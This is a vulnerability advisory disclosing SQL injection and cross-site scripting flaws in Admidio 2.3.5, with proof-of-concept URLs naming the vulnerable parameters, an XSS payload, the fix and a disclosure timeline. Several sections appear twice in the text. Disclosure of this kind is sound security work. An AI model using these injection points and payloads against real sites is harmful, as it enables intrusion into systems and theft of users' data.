SSCHADV2012-019 - Admidio 2.3.5 Multiple security vulnerabilities
Advisory:
|
Admidio 2.3.5 Multiple security vulnerabilities
|
Advisory ID:
|
SSCHADV2012-019
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Admidio 2.3.5
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2012-4748, CVE-2012-4749
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Admidio 2.3.5 is prone to XSS and SQLi vulnerabilities
==============
PoC-Exploit
==============
//SQLi (CVE-2012-4748)
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS (CVE-2012-4749)
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "
=====
Solution
=====
Upgrade to the latest version 2.3.6
================
Disclosure Timeline
================
21-Aug-2012 – developer informed
PoC-Exploit
==============
//SQLi (CVE-2012-4748)
http://[target]/admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection]
//XSS (CVE-2012-4749)
http://[target]/admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) "
=====
Solution
=====
Upgrade to the latest version 2.3.6
================
Disclosure Timeline
================
21-Aug-2012 – developer informed
21-Aug-2012 – feedback from developer
28-Aug-2012 – fixed in version 2.3.6
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
Comments
Display comments as Linear | Threaded